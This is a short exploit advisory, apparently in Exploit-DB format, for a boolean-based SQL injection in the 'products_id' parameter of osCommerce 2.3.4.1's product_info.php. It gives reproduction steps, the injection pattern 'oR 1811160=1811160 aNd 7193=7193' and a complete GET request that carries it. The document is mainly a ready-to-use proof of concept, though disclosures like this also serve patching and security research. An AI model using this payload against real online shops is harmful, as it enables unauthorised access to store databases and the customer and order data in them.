##################################################################### Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities# Dork: N/A# Date: 05-02-2019# Exploit Author: Mehmet EMIROGLU# Vendor Homepage: https://www.oscommerce.com# Software Link: https://www.oscommerce.com/Products# Version: 2.3.4.1# Category: Webapps# Tested on: Wampp @Win# CVE: N/A# Software Description: osCommerce Online Merchant is a complete online
store solution
that contains both a shop frontend and an administration backend
which can be easily configured and customized with over 8,855 free
add-ons.##################################################################### Vulnerabilities / Impact# This web application called as osCommerce 2.3.4.1 version.# Switch to the product_info tab. Replace the ID value in the url, with a
high number value.for example product_info.php?products_id=1 change to 9999999
then add the payload at Attack_pattern to the end of the url.##################################################################### POC - SQL (Boolean Based)# Parameters : products_id# Attack Pattern : oR 1811160=1811160 aNd 7193=7193# GET Request :
http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
oR 1811160=1811160 aNd 7193=7193####################################################################
